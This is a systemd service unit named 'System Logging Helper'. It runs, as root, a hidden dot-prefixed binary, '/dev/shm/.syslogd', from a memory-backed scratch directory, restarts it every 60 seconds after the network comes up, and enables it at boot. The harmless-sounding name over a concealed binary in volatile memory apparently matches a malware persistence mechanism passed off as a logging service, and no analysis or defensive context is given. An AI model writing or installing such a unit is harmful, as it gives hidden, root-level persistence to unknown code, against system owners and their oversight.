[Unit]
Description=System Logging Helper
After=network-online.target

[Service]
Type=simple
User=root
ExecStart=/bin/sh -c "/dev/shm/.syslogd -q"
Restart=always
RestartSec=60

[Install]
WantedBy=multi-user.target
